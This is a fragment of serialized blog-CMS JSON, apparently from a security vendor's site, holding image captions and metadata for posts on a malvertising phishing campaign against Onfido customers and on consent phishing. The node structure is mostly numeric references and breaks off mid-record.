"linkType":318},[],{"nodeType":231,"data":129686,"content":129687},{},[],{"nodeType":169,"data":129689,"content":129690},{},[129691],{"nodeType":173,"value":69604,"marks":129692,"data":129694},[129693],{"type":370},{},{"nodeType":178,"data":129696,"content":129697},{},[129698],{"nodeType":173,"value":69612,"marks":129699,"data":129700},[],{},{"nodeType":178,"data":129702,"content":129703},{},[129704],{"nodeType":173,"value":69619,"marks":129705,"data":129706},[],{},{"nodeType":312,"data":129708,"content":129711},{"target":129709},{"sys":129710},{"id":69626,"type":317,"linkType":318},[],{"nodeType":231,"data":129713,"content":129714},{},[],{"nodeType":169,"data":129716,"content":129717},{},[129718],{"nodeType":173,"value":69635,"marks":129719,"data":129721},[129720],{"type":370},{},{"nodeType":178,"data":129723,"content":129724},{},[129725],{"nodeType":173,"value":69643,"marks":129726,"data":129727},[],{},{"nodeType":178,"data":129729,"content":129730},{},[129731],{"nodeType":173,"value":69650,"marks":129732,"data":129733},[],{},{"nodeType":231,"data":129735,"content":129736},{},[],{"nodeType":169,"data":129738,"content":129739},{},[129740],{"nodeType":173,"value":69660,"marks":129741,"data":129743},[129742],{"type":370},{},{"nodeType":178,"data":129745,"content":129746},{},[129747],{"nodeType":173,"value":69668,"marks":129748,"data":129749},[],{},{"nodeType":178,"data":129751,"content":129752},{},[129753],{"nodeType":173,"value":69675,"marks":129754,"data":129755},[],{},{"nodeType":312,"data":129757,"content":129760},{"target":129758},{"sys":129759},{"id":69682,"type":317,"linkType":318},[],{"nodeType":178,"data":129762,"content":129763},{},[129764],{"nodeType":173,"value":69688,"marks":129765,"data":129766},[],{},{"nodeType":250,"data":129768,"content":129769},{},[129770,129779,129788],{"nodeType":254,"data":129771,"content":129772},{},[129773],{"nodeType":178,"data":129774,"content":129775},{},[129776],{"nodeType":173,"value":69701,"marks":129777,"data":129778},[],{},{"nodeType":254,"data":129780,"content":129781},{},[129782],{"nodeType":178,"data":129783,"content":129784},{},[129785],{"nodeType":173,"value":69711,"marks":129786,"data":129787},[],{},{"nodeType":254,"data":129789,"content":129790},{},[129791],{"nodeType":178,"data":129792,"content":129793},{},[129794],{"nodeType":173,"value":69721,"marks":129795,"data":129796},[],{},{"nodeType":312,"data":129798,"content":129801},{"target":129799},{"sys":129800},{"id":69728,"type":317,"linkType":318},[],{"nodeType":235,"data":129803,"content":129804},{},[129805],{"nodeType":173,"value":461,"marks":129806,"data":129808},[129807],{"type":370},{},{"nodeType":178,"data":129810,"content":129811},{},[129812],{"nodeType":173,"value":69741,"marks":129813,"data":129814},[],{},{"nodeType":178,"data":129816,"content":129817},{},[129818,129821,129827],{"nodeType":173,"value":69748,"marks":129819,"data":129820},[],{},{"nodeType":186,"data":129822,"content":129823},{"uri":1469},[129824],{"nodeType":173,"value":476,"marks":129825,"data":129826},[],{},{"nodeType":173,"value":69758,"marks":129828,"data":129829},[],{},{"entries":129831},{"hyperlink":129832,"inline":129833,"block":129834},[],[],[129835,129838,129844,129850,129864,129869,129876,129882,129888,129894,129899,129901,129905],{"sys":129836,"__typename":5345,"title":80168,"caption":80169,"layoutMode":118,"file":129837},{"id":63196},{"url":80171,"width":80172,"height":80173},{"sys":129839,"__typename":5345,"title":129840,"caption":129840,"layoutMode":118,"file":129841},{"id":69336},"Comparing the legit and fake Onfido ads",{"url":129842,"width":5358,"height":129843},"https://images.ctfassets.net/y1cdw1ablpvd/1VS5obdMsSI3DPa9FrsXFG/b38bb5a4f17f34a35622ebb1972df585/image10.png",646,{"sys":129845,"__typename":5345,"title":129846,"caption":129846,"layoutMode":118,"file":129847},{"id":69437},"Phishing links can be delivered over various channels",{"url":129848,"width":5358,"height":129849},"https://images.ctfassets.net/y1cdw1ablpvd/4y9BmDA858RM488qvHlXE8/d03598f89b5c1b991808c7452fd87db8/image5.png",857,{"sys":129851,"__typename":5311,"content":129852,"name":129863,"title":118},{"id":69450},{"json":129853},{"nodeType":165,"data":129854,"content":129855},{},[129856],{"nodeType":178,"data":129857,"content":129858},{},[129859],{"nodeType":173,"value":129860,"marks":129861,"data":129862},"This is one of the reasons that phishing attacks that bypass email like malvertising are so appealing. Many organizations rely exclusively on phishing controls deployed at the email level. But these are sidestepped entirely by attacks taking place over alternative channels.",[],{},"Onfido blog insight box",{"sys":129865,"__typename":5345,"title":129866,"caption":129867,"layoutMode":118,"file":129868},{"id":69500},"Consent phishing blog image 6","Cloudflare Turnstile is often used to prevent security bots from analysing the attacker's phishing page.",{"url":123320,"width":123321,"height":123322},{"sys":129870,"__typename":5345,"title":129871,"caption":129871,"layoutMode":118,"file":129872},{"id":69513},"The phishing page specifies the url path must include googleadservices.com",{"url":129873,"width":129874,"height":129875},"https://images.ctfassets.net/y1cdw1ablpvd/4eh1I88zphKkBgcUNpM1dY/7d82e055d242655bff5de2d956ea82b7/image9.png",512,189,{"sys":129877,"__typename":5345,"title":129878,"caption":129878,"layoutMode":118,"file":129879},{"id":69550},"Us.com website information",{"url":129880,"width":129881,"height":46394},"https://images.ctfassets.net/y1cdw1ablpvd/5wpGuRMqeZoyUmP0IWfufp/329b132dfcc697a3dee894f7fd97856b/image6.png",1425,{"sys":129883,"__typename":5345,"title":129884,"caption":129884,"layoutMode":118,"file":129885},{"id":69563},"Get your Adobe.us.com domain for less than $20!",{"url":129886,"width":5358,"height":129887},"https://images.ctfassets.net/y1cdw1ablpvd/5MQmlWJIeckRUyUO3nzEk3/01b7b7acbde12fc1e68279f0dbfcd0fb/image4.png",265,{"sys":129889,"__typename":5345,"title":129890,"caption":129890,"layoutMode":118,"file":129891},{"id":69589},"urlscan entry for dashboard[.]onfido[.]us[.]com",{"url":129892,"width":5358,"height":129893},"https://images.ctfassets.net/y1cdw1ablpvd/6qZbv6gjlctB9vJ9eO4oca/ef26bbdfd01919f2422a77c73064d186/image2.png",895,{"sys":129895,"__typename":5345,"title":129896,"caption":129896,"layoutMode":118,"file":129897},{"id":69595},"Recent urlscan results for .us.com",{"url":129898,"width":5358,"height":123345},"https://images.ctfassets.net/y1cdw1ablpvd/2GAeZCHOt0JONUlZ2Y7wbX/b2d8d21c79a698b267089b9be6929f95/image8.png",{"sys":129900,"__typename":5434,"title":121062,"arcadeDemoUrl":121063,"playText":27947},{"id":69626},{"sys":129902,"__typename":5434,"title":129903,"arcadeDemoUrl":129904,"playText":11935},{"id":69682},"Onfido Evilginx Phishing Detection","https://demo.arcade.software/4dLz4mzxZRjgsxfXjWqe?embed",{"sys":129906,"__typename":5345,"title":129907,"caption":129907,"layoutMode":118,"file":129908},{"id":69728},"Push app banner guiding users to login via their SSO platform",{"url":129909,"width":5358,"height":51600},"https://images.ctfassets.net/y1cdw1ablpvd/4TFCJts9lev3A6zaC1kJEp/0eb43be23651aacafbc5569cfe02fb80/image1.png","content:blog:investigating-a-recent-malvertising-campaign-targeting-onfido-customers.json","blog/investigating-a-recent-malvertising-campaign-targeting-onfido-customers.json","blog/investigating-a-recent-malvertising-campaign-targeting-onfido-customers",{"_path":129914,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":129915,"ogImage":118,"summary":129917,"title":107128,"subtitle":118,"metaTitle":129928,"synopsis":107129,"hashTags":118,"publishedDate":107130,"slug":107131,"tagsCollection":129929,"relatedBlogPostsCollection":129935,"authorsCollection":131760,"content":131764,"_id":132246,"_type":5439,"_source":5440,"_file":132247,"_stem":132248,"_extension":5439},"/blog/how-consent-phishing-is-evolving",{"id":106695,"publishedAt":129916},"2025-03-31T11:57:32.747Z",{"json":129918},{"data":129919,"content":129920,"nodeType":165},{},[129921],{"data":129922,"content":129923,"nodeType":178},{},[129924],{"data":129925,"marks":129926,"value":129927,"nodeType":173},{},[],"Consent phishing is where attackers trick users into authorizing malicious OAuth apps. But we’re now seeing different use cases emerge as attackers get creative to evade detection controls. ","Analyzing two different forms of consent phishing",{"items":129930},[129931,129933],{"sys":129932,"name":505},{"id":504},{"sys":129934,"name":509},{"id":508},{"items":129936},[129937,130223,131088],{"__typename":1528,"sys":129938,"content":129939,"title":496,"synopsis":497,"hashTags":118,"publishedDate":498,"slug":499,"tagsCollection":130213,"authorsCollection":130219},{"id":162},{"json":129940},{"nodeType":165,"data":129941,"content":129942},{},[129943,129949,129965,129978,129984,129990,129993,129999,130005,130053,130059,130064,130067,130073,130079,130085,130091,130097,130111,130116,130122,130128,130142,130147,130153,130159,130165,130171,130177,130180,130186,130202,130207],{"nodeType":169,"data":129944,"content":129945},{},[129946],{"nodeType":173,"value":174,"marks":129947,"data":129948},[],{},{"nodeType":178,"data":129950,"content":129951},{},[129952,129955,129962],{"nodeType":173,"value":182,"marks":129953,"data":129954},[],{},{"nodeType":186,"data":129956,"content":129957},{"uri":188},[129958],{"nodeType":173,"value":191,"marks":129959,"data":129961},[129960],{"type":194},{},{"nodeType":173,"value":197,"marks":129963,"data":129964},[],{},{"nodeType":178,"data":129966,"content":129967},{},[129968,129971,129975],{"nodeType":173,"value":204,"marks":129969,"data":129970},[],{},{"nodeType":173,"value":208,"marks":129972,"data":129974},[129973],{"type":194},{},{"nodeType":173,"value":213,"marks":129976,"data":129977},[],{},{"nodeType":178,"data":129979,"content":129980},{},[129981],{"nodeType":173,"value":220,"marks":129982,"data":129983},[],{},{"nodeType":178,"data":129985,"content":129986},{},[129987],{"nodeType":173,"value":227,"marks":129988,"data":129989},[],{},{"nodeType":231,"data":129991,"content":129992},{},[],{"nodeType":235,"data":129994,"content":129995},{},[129996],{"nodeType":173,"value":239,"marks":129997,"data":129998},[],{},{"nodeType":178,"data":130000,"content":130001},{},[130002],{"nodeType":173,"value":246,"marks":130003,"data":130004},[],{},{"nodeType":250,"data":130006,"content":130007},{},[130008,130017,130026,130035,130044],{"nodeType":254,"data":130009,"content":130010},{},[130011],{"nodeType":178,"data":130012,"content":130013},{},[130014],{"nodeType":173,"value":261,"marks":130015,"data":130016},[],{},{"nodeType":254,"data":130018,"content":130019},{},[130020],{"nodeType":178,"data":130021,"content":130022},{},[130023],{"nodeType":173,"value":271,"marks":130024,"data":130025},[],{},{"nodeType":254,"data":130027,"content":130028},{},[130029],{"nodeType":178,"data":130030,"content":130031},{},[130032],{"nodeType":173,"value":281,"marks":130033,"data":130034},[],{},{"nodeType":254,"data":130036,"content":130037},{},[130038],{"nodeType":178,"data":130039,"content":130040},{},[130041],{"nodeType":173,"value":291,"marks":130042,"data":130043},[],{},{"nodeType":254,"data":130045,"content":130046},{},[130047],{"nodeType":178,"data":130048,"content":130049},{},[130050],{"nodeType":173,"value":301,"marks":130051,"data":130052},[],{},{"nodeType":178,"data":130054,"content":130055},{},[130056],{"nodeType":173,"value":308,"marks":130057,"data":130058},[],{},{"nodeType":312,"data":130060,"content":130063},{"target":130061},{"sys":130062},{"id":316,"type":317,"linkType":318},[],{"nodeType":231,"data":130065,"content":130066},{},[],{"nodeType":235,"data":130068,"content":130069},{},[130070],{"nodeType":173,"value":327,"marks":130071,"data":130072},[],{},{"nodeType":178,"data":130074,"content":130075},{},[130076],{"nodeType":173,"value":334,"marks":130077,"data":130078},[],{},{"nodeType":178,"data":130080,"content":130081},{},[130082],{"nodeType":173,"value":341,"marks":130083,"data":130084},[],{},{"nodeType":178,"data":130086,"content":130087},{},[130088],{"nodeType":173,"value":348,"marks":130089,"data":130090},[],{},{"nodeType":178,"data":130092,"content":130093},{},[130094],{"nodeType":173,"value":355,"marks":130095,"data":130096},[],{},{"nodeType":235,"data":130098,"content":130099},{},[130100,130103,130108],{"nodeType":173,"value":362,"marks":130101,"data":130102},[],{},{"nodeType":173,"value":366,"marks":130104,"data":130107},[130105,130106],{"type":194},{"type":370},{},{"nodeType":173,"value":373,"marks":130109,"data":130110},[],{},{"nodeType":312,"data":130112,"content":130115},{"target":130113},{"sys":130114},{"id":380,"type":317,"linkType":318},[],{"nodeType":178,"data":130117,"content":130118},{},[130119],{"nodeType":173,"value":386,"marks":130120,"data":130121},[],{},{"nodeType":178,"data":130123,"content":130124},{},[130125],{"nodeType":173,"value":393,"marks":130126,"data":130127},[],{},{"nodeType":235,"data":130129,"content":130130},{},[130131,130134,130139],{"nodeType":173,"value":400,"marks":130132,"data":130133},[],{},{"nodeType":173,"value":404,"marks":130135,"data":130138},[130136,130137],{"type":194},{"type":370},{},{"nodeType":173,"value":410,"marks":130140,"data":130141},[],{},{"nodeType":312,"data":130143,"content":130146},{"target":130144},{"sys":130145},{"id":417,"type":317,"linkType":318},[],{"nodeType":178,"data":130148,"content":130149},{},[130150],{"nodeType":173,"value":423,"marks":130151,"data":130152},[],{},{"nodeType":178,"data":130154,"content":130155},{},[130156],{"nodeType":173,"value":430,"marks":130157,"data":130158},[],{},{"nodeType":178,"data":130160,"content":130161},{},[130162],{"nodeType":173,"value":437,"marks":130163,"data":130164},[],{},{"nodeType":178,"data":130166,"content":130167},{},[130168],{"nodeType":173,"value":444,"marks":130169,"data":130170},[],{},{"nodeType":178,"data":130172,"content":130173},{},[130174],{"nodeType":173,"value":451,"marks":130175,"data":130176},[],{},{"nodeType":231,"data":130178,"content":130179},{},[],{"nodeType":169,"data":130181,"content":130182},{},[130183],{"nodeType":173,"value":461,"marks":130184,"data":130185},[],{},{"nodeType":178,"data":130187,"content":130188},{},[130189,130192,130199],{"nodeType":173,"value":468,"marks":130190,"data":130191},[],{},{"nodeType":186,"data":130193,"content":130194},{"uri":473},[130195],{"nodeType":173,"value":476,"marks":130196,"data":130198},[130197],{"type":194},{},{"nodeType":173,"value":481,"marks":130200,"data":130201},[],{},{"nodeType":312,"data":130203,"content":130206},{"target":130204},{"sys":130205},{"id":488,"type":317,"linkType":318},[],{"nodeType":178,"data":130208,"content":130209},{},[130210],{"nodeType":173,"value":37,"marks":130211,"data":130212},[],{},{"items":130214},[130215,130217],{"sys":130216,"name":505},{"id":504},{"sys":130218,"name":509},{"id":508},{"items":130220},[130221],{"fullName":513,"firstName":71176,"jobTitle":514,"profilePicture":130222},{"url":516},{"__typename":1528,"sys":130224,"content":130225,"title":46314,"synopsis":112267,"hashTags":118,"publishedDate":77669,"slug":46315,"tagsCollection":131078,"authorsCollection":131084},{"id":24759},{"json":130226},{"nodeType":165,"data":130227,"content":130228},{},[130229,130245,130251,130257,130263,130269,130274,130280,130293,130296,130302,130308,130314,130320,130329,130335,130341,130347,130354,130360,130422,130432,130438,130445,130451,130501,130511,130517,130522,130529,130535,130564,130584,130590,130599,130602,130608,130624,130630,130660,130666,130672,130678,130683,130686,130692,130698,130705,130711,130717,130730,130735,130742,130748,130753,130760,130776,130782,130808,130825,130830,130846,130862,130869,130875,130881,130886,130902,130905,130912,130925,130931,130937,130981,130986,130992,130998,131037,131040,131047,131053,131056,131062],{"nodeType":178,"data":130230,"content":130231},{},[130232,130235,130242],{"nodeType":173,"value":111298,"marks":130233,"data":130234},[],{},{"nodeType":186,"data":130236,"content":130237},{"uri":111303},[130238],{"nodeType":173,"value":111306,"marks":130239,"data":130241},[130240],{"type":194},{},{"nodeType":173,"value":53584,"marks":130243,"data":130244},[],{},{"nodeType":178,"data":130246,"content":130247},{},[130248],{"nodeType":173,"value":111317,"marks":130249,"data":130250},[],{},{"nodeType":178,"data":130252,"content":130253},{},[130254],{"nodeType":173,"value":111324,"marks":130255,"data":130256},[],{},{"nodeType":178,"data":130258,"content":130259},{},[130260],{"nodeType":173,"value":111331,"marks":130261,"data":130262},[],{},{"nodeType":178,"data":130264,"content":130265},{},[130266],{"nodeType":173,"value":111338,"marks":130267,"data":130268},[],{},{"nodeType":312,"data":130270,"content":130273},{"target":130271},{"sys":130272},{"id":111345,"type":317,"linkType":318},[],{"nodeType":178,"data":130275,"content":130276},{},[130277],{"nodeType":173,"value":111351,"marks":130278,"data":130279},[],{},{"nodeType":178,"data":130281,"content":130282},{},[130283,130286,130290],{"nodeType":173,"value":111358,"marks":130284,"data":130285},[],{},{"nodeType":173,"value":2578,"marks":130287,"data":130289},[130288],{"type":370},{},{"nodeType":173,"value":111366,"marks":130291,"data":130292},[],{},{"nodeType":231,"data":130294,"content":130295},{},[],{"nodeType":169,"data":130297,"content":130298},{},[130299],{"nodeType":173,"value":111376,"marks":130300,"data":130301},[],{},{"nodeType":178,"data":130303,"content":130304},{},[130305],{"nodeType":173,"value":111383,"marks":130306,"data":130307},[],{},{"nodeType":178,"data":130309,"content":130310},{},[130311],{"nodeType":173,"value":111390,"marks":130312,"data":130313},[],{},{"nodeType":178,"data":130315,"content":130316},{},[130317],{"nodeType":173,"value":111397,"marks":130318,"data":130319},[],{},{"nodeType":3769,"data":130321,"content":130322},{},[130323],{"nodeType":178,"data":130324,"content":130325},{},[130326],{"nodeType":173,"value":111407,"marks":130327,"data":130328},[],{},{"nodeType":178,"data":130330,"content":130331},{},[130332],{"nodeType":173,"value":111414,"marks":130333,"data":130334},[],{},{"nodeType":178,"data":130336,"content":130337},{},[130338],{"nodeType":173,"value":111421,"marks":130339,"data":130340},[],{},{"nodeType":178,"data":130342,"content":130343},{},[130344],{"nodeType":173,"value":111428,"marks":130345,"data":130346},[],{},{"nodeType":235,"data":130348,"content":130349},{},[130350],{"nodeType":173,"value":111435,"marks":130351,"data":130353},[130352],{"type":370},{},{"nodeType":178,"data":130355,"content":130356},{},[130357],{"nodeType":173,"value":111443,"marks":130358,"data":130359},[],{},{"nodeType":250,"data":130361,"content":130362},{},[130363,130386,130409],{"nodeType":254,"data":130364,"content":130365},{},[130366],{"nodeType":178,"data":130367,"content":130368},{},[130369,130373,130376,130383],{"nodeType":173,"value":111456,"marks":130370,"data":130372},[130371],{"type":370},{},{"nodeType":173,"value":111461,"marks":130374,"data":130375},[],{},{"nodeType":186,"data":130377,"content":130378},{"uri":4492},[130379],{"nodeType":173,"value":111468,"marks":130380,"data":130382},[130381],{"type":194},{},{"nodeType":173,"value":111473,"marks":130384,"data":130385},[],{},{"nodeType":254,"data":130387,"content":130388},{},[130389],{"nodeType":178,"data":130390,"content":130391},{},[130392,130396,130399,130406],{"nodeType":173,"value":111483,"marks":130393,"data":130395},[130394],{"type":370},{},{"nodeType":173,"value":111488,"marks":130397,"data":130398},[],{},{"nodeType":186,"data":130400,"content":130401},{"uri":832},[130402],{"nodeType":173,"value":835,"marks":130403,"data":130405},[130404],{"type":194},{},{"nodeType":173,"value":111499,"marks":130407,"data":130408},[],{},{"nodeType":254,"data":130410,"content":130411},{},[130412],{"nodeType":178,"data":130413,"content":130414},{},[130415,130419],{"nodeType":173,"value":111509,"marks":130416,"data":130418},[130417],{"type":370},{},{"nodeType":173,"value":111514,"marks":130420,"data":130421},[],{},{"nodeType":178,"data":130423,"content":130424},{},[130425,130429],{"nodeType":173,"value":111521,"marks":130426,"data":130428},[130427],{"type":370},{},{"nodeType":173,"value":111526,"marks":130430,"data":130431},[],{},{"nodeType":178,"data":130433,"content":130434},{},[130435],{"nodeType":173,"value":111533,"marks":130436,"data":130437},[],{},{"nodeType":235,"data":130439,"content":130440},{},[130441],{"nodeType":173,"value":111540,"marks":130442,"data":130444},[130443],{"type":370},{},{"nodeType":178,"data":130446,"content":130447},{},[130448],{"nodeType":173,"value":111548,"marks":130449,"data":130450},[],{},{"nodeType":250,"data":130452,"content":130453},{},[130454,130478],{"nodeType":254,"data":130455,"content":130456},{},[130457],{"nodeType":178,"data":130458,"content":130459},{},[130460,130463,130471,130475],{"nodeType":173,"value":37,"marks":130461,"data":130462},[],{},{"nodeType":186,"data":130464,"content":130465},{"uri":111565},[130466],{"nodeType":173,"value":111568,"marks":130467,"data":130470},[130468,130469],{"type":194},{"type":370},{},{"nodeType":173,"value":3107,"marks":130472,"data":130474},[130473],{"type":370},{},{"nodeType":173,"value":111578,"marks":130476,"data":130477},[],{},{"nodeType":254,"data":130479,"content":130480},{},[130481],{"nodeType":178,"data":130482,"content":130483},{},[130484,130488,130491,130498],{"nodeType":173,"value":111588,"marks":130485,"data":130487},[130486],{"type":370},{},{"nodeType":173,"value":111593,"marks":130489,"data":130490},[],{},{"nodeType":186,"data":130492,"content":130493},{"uri":27492},[130494],{"nodeType":173,"value":4475,"marks":130495,"data":130497},[130496],{"type":194},{},{"nodeType":173,"value":111604,"marks":130499,"data":130500},[],{},{"nodeType":178,"data":130502,"content":130503},{},[130504,130508],{"nodeType":173,"value":111611,"marks":130505,"data":130507},[130506],{"type":370},{},{"nodeType":173,"value":111616,"marks":130509,"data":130510},[],{},{"nodeType":178,"data":130512,"content":130513},{},[130514],{"nodeType":173,"value":111623,"marks":130515,"data":130516},[],{},{"nodeType":312,"data":130518,"content":130521},{"target":130519},{"sys":130520},{"id":71430,"type":317,"linkType":318},[],{"nodeType":235,"data":130523,"content":130524},{},[130525],{"nodeType":173,"value":111635,"marks":130526,"data":130528},[130527],{"type":370},{},{"nodeType":178,"data":130530,"content":130531},{},[130532],{"nodeType":173,"value":111643,"marks":130533,"data":130534},[],{},{"nodeType":250,"data":130536,"content":130537},{},[130538,130551],{"nodeType":254,"data":130539,"content":130540},{},[130541],{"nodeType":178,"data":130542,"content":130543},{},[130544,130548],{"nodeType":173,"value":111656,"marks":130545,"data":130547},[130546],{"type":370},{},{"nodeType":173,"value":111661,"marks":130549,"data":130550},[],{},{"nodeType":254,"data":130552,"content":130553},{},[130554],{"nodeType":178,"data":130555,"content":130556},{},[130557,130561],{"nodeType":173,"value":111671,"marks":130558,"data":130560},[130559],{"type":370},{},{"nodeType":173,"value":111676,"marks":130562,"data":130563},[],{},{"nodeType":178,"data":130565,"content":130566},{},[130567,130571,130574,130581],{"nodeType":173,"value":111611,"marks":130568,"data":130570},[130569],{"type":370},{},{"nodeType":173,"value":111687,"marks":130572,"data":130573},[],{},{"nodeType":186,"data":130575,"content":130576},{"uri":77262},[130577],{"nodeType":173,"value":111694,"marks":130578,"data":130580},[130579],{"type":194},{},{"nodeType":173,"value":111699,"marks":130582,"data":130583},[],{},{"nodeType":178,"data":130585,"content":130586},{},[130587],{"nodeType":173,"value":111706,"marks":130588,"data":130589},[],{},{"nodeType":3769,"data":130591,"content":130592},{},[130593],{"nodeType":178,"data":130594,"content":130595},{},[130596],{"nodeType":173,"value":111716,"marks":130597,"data":130598},[],{},{"nodeType":231,"data":130600,"content":130601},{},[],{"nodeType":169,"data":130603,"content":130604},{},[130605],{"nodeType":173,"value":111726,"marks":130606,"data":130607},[],{},{"nodeType":178,"data":130609,"content":130610},{},[130611,130614,130621],{"nodeType":173,"value":111733,"marks":130612,"data":130613},[],{},{"nodeType":186,"data":130615,"content":130616},{"uri":81621},[130617],{"nodeType":173,"value":111740,"marks":130618,"data":130620},[130619],{"type":194},{},{"nodeType":173,"value":111745,"marks":130622,"data":130623},[],{},{"nodeType":178,"data":130625,"content":130626},{},[130627],{"nodeType":173,"value":111752,"marks":130628,"data":130629},[],{},{"nodeType":250,"data":130631,"content":130632},{},[130633,130642,130651],{"nodeType":254,"data":130634,"content":130635},{},[130636],{"nodeType":178,"data":130637,"content":130638},{},[130639],{"nodeType":173,"value":111765,"marks":130640,"data":130641},[],{},{"nodeType":254,"data":130643,"content":130644},{},[130645],{"nodeType":178,"data":130646,"content":130647},{},[130648],{"nodeType":173,"value":111775,"marks":130649,"data":130650},[],{},{"nodeType":254,"data":130652,"content":130653},{},[130654],{"nodeType":178,"data":130655,"content":130656},{},[130657],{"nodeType":173,"value":111785,"marks":130658,"data":130659},[],{},{"nodeType":178,"data":130661,"content":130662},{},[130663],{"nodeType":173,"value":111792,"marks":130664,"data":130665},[],{},{"nodeType":178,"data":130667,"content":130668},{},[130669],{"nodeType":173,"value":111799,"marks":130670,"data":130671},[],{},{"nodeType":178,"data":130673,"content":130674},{},[130675],{"nodeType":173,"value":111806,"marks":130676,"data":130677},[],{},{"nodeType":312,"data":130679,"content":130682},{"target":130680},{"sys":130681},{"id":111813,"type":317,"linkType":318},[],{"nodeType":231,"data":130684,"content":130685},{},[],{"nodeType":169,"data":130687,"content":130688},{},[130689],{"nodeType":173,"value":111822,"marks":130690,"data":130691},[],{},{"nodeType":178,"data":130693,"content":130694},{},[130695],{"nodeType":173,"value":111829,"marks":130696,"data":130697},[],{},{"nodeType":235,"data":130699,"content":130700},{},[130701],{"nodeType":173,"value":111836,"marks":130702,"data":130704},[130703],{"type":370},{},{"nodeType":178,"data":130706,"content":130707},{},[130708],{"nodeType":173,"value":111844,"marks":130709,"data":130710},[],{},{"nodeType":178,"data":130712,"content":130713},{},[130714],{"nodeType":173,"value":111851,"marks":130715,"data":130716},[],{},{"nodeType":178,"data":130718,"content":130719},{},[130720,130723,130727],{"nodeType":173,"value":111858,"marks":130721,"data":130722},[],{},{"nodeType":173,"value":67363,"marks":130724,"data":130726},[130725],{"type":1646},{},{"nodeType":173,"value":111866,"marks":130728,"data":130729},[],{},{"nodeType":312,"data":130731,"content":130734},{"target":130732},{"sys":130733},{"id":111873,"type":317,"linkType":318},[],{"nodeType":235,"data":130736,"content":130737},{},[130738],{"nodeType":173,"value":111879,"marks":130739,"data":130741},[130740],{"type":370},{},{"nodeType":178,"data":130743,"content":130744},{},[130745],{"nodeType":173,"value":111887,"marks":130746,"data":130747},[],{},{"nodeType":312,"data":130749,"content":130752},{"target":130750},{"sys":130751},{"id":111894,"type":317,"linkType":318},[],{"nodeType":235,"data":130754,"content":130755},{},[130756],{"nodeType":173,"value":111900,"marks":130757,"data":130759},[130758],{"type":370},{},{"nodeType":178,"data":130761,"content":130762},{},[130763,130766,130773],{"nodeType":173,"value":111908,"marks":130764,"data":130765},[],{},{"nodeType":186,"data":130767,"content":130768},{"uri":111913},[130769],{"nodeType":173,"value":111916,"marks":130770,"data":130772},[130771],{"type":194},{},{"nodeType":173,"value":111921,"marks":130774,"data":130775},[],{},{"nodeType":178,"data":130777,"content":130778},{},[130779],{"nodeType":173,"value":111928,"marks":130780,"data":130781},[],{},{"nodeType":178,"data":130783,"content":130784},{},[130785,130788,130795,130798,130805],{"nodeType":173,"value":111935,"marks":130786,"data":130787},[],{},{"nodeType":186,"data":130789,"content":130790},{"uri":111940},[130791],{"nodeType":173,"value":111943,"marks":130792,"data":130794},[130793],{"type":194},{},{"nodeType":173,"value":111948,"marks":130796,"data":130797},[],{},{"nodeType":186,"data":130799,"content":130800},{"uri":111953},[130801],{"nodeType":173,"value":111956,"marks":130802,"data":130804},[130803],{"type":194},{},{"nodeType":173,"value":111961,"marks":130806,"data":130807},[],{},{"nodeType":178,"data":130809,"content":130810},{},[130811,130814,130822],{"nodeType":173,"value":2596,"marks":130812,"data":130813},[],{},{"nodeType":186,"data":130815,"content":130816},{"uri":62639},[130817],{"nodeType":173,"value":111974,"marks":130818,"data":130821},[130819,130820],{"type":194},{"type":370},{},{"nodeType":173,"value":111980,"marks":130823,"data":130824},[],{},{"nodeType":312,"data":130826,"content":130829},{"target":130827},{"sys":130828},{"id":105077,"type":317,"linkType":318},[],{"nodeType":178,"data":130831,"content":130832},{},[130833,130836,130843],{"nodeType":173,"value":111992,"marks":130834,"data":130835},[],{},{"nodeType":186,"data":130837,"content":130838},{"uri":111997},[130839],{"nodeType":173,"value":112000,"marks":130840,"data":130842},[130841],{"type":194},{},{"nodeType":173,"value":112005,"marks":130844,"data":130845},[],{},{"nodeType":178,"data":130847,"content":130848},{},[130849,130852,130859],{"nodeType":173,"value":112012,"marks":130850,"data":130851},[],{},{"nodeType":186,"data":130853,"content":130854},{"uri":112017},[130855],{"nodeType":173,"value":112020,"marks":130856,"data":130858},[130857],{"type":194},{},{"nodeType":173,"value":112025,"marks":130860,"data":130861},[],{},{"nodeType":235,"data":130863,"content":130864},{},[130865],{"nodeType":173,"value":112032,"marks":130866,"data":130868},[130867],{"type":370},{},{"nodeType":178,"data":130870,"content":130871},{},[130872],{"nodeType":173,"value":112040,"marks":130873,"data":130874},[],{},{"nodeType":178,"data":130876,"content":130877},{},[130878],{"nodeType":173,"value":112047,"marks":130879,"data":130880},[],{},{"nodeType":312,"data":130882,"content":130885},{"target":130883},{"sys":130884},{"id":112054,"type":317,"linkType":318},[],{"nodeType":178,"data":130887,"content":130888},{},[130889,130892,130899],{"nodeType":173,"value":112060,"marks":130890,"data":130891},[],{},{"nodeType":186,"data":130893,"content":130894},{"uri":77513},[130895],{"nodeType":173,"value":2570,"marks":130896,"data":130898},[130897],{"type":194},{},{"nodeType":173,"value":112071,"marks":130900,"data":130901},[],{},{"nodeType":231,"data":130903,"content":130904},{},[],{"nodeType":169,"data":130906,"content":130907},{},[130908],{"nodeType":173,"value":112081,"marks":130909,"data":130911},[130910],{"type":370},{},{"nodeType":178,"data":130913,"content":130914},{},[130915,130918,130922],{"nodeType":173,"value":112089,"marks":130916,"data":130917},[],{},{"nodeType":173,"value":3107,"marks":130919,"data":130921},[130920],{"type":370},{},{"nodeType":173,"value":112097,"marks":130923,"data":130924},[],{},{"nodeType":178,"data":130926,"content":130927},{},[130928],{"nodeType":173,"value":112104,"marks":130929,"data":130930},[],{},{"nodeType":178,"data":130932,"content":130933},{},[130934],{"nodeType":173,"value":71740,"marks":130935,"data":130936},[],{},{"nodeType":250,"data":130938,"content":130939},{},[130940,130963,130972],{"nodeType":254,"data":130941,"content":130942},{},[130943],{"nodeType":178,"data":130944,"content":130945},{},[130946,130949,130953,130956,130960],{"nodeType":173,"value":18635,"marks":130947,"data":130948},[],{},{"nodeType":173,"value":2578,"marks":130950,"data":130952},[130951],{"type":370},{},{"nodeType":173,"value":112130,"marks":130954,"data":130955},[],{},{"nodeType":173,"value":18649,"marks":130957,"data":130959},[130958],{"type":370},{},{"nodeType":173,"value":112138,"marks":130961,"data":130962},[],{},{"nodeType":254,"data":130964,"content":130965},{},[130966],{"nodeType":178,"data":130967,"content":130968},{},[130969],{"nodeType":173,"value":112148,"marks":130970,"data":130971},[],{},{"nodeType":254,"data":130973,"content":130974},{},[130975],{"nodeType":178,"data":130976,"content":130977},{},[130978],{"nodeType":173,"v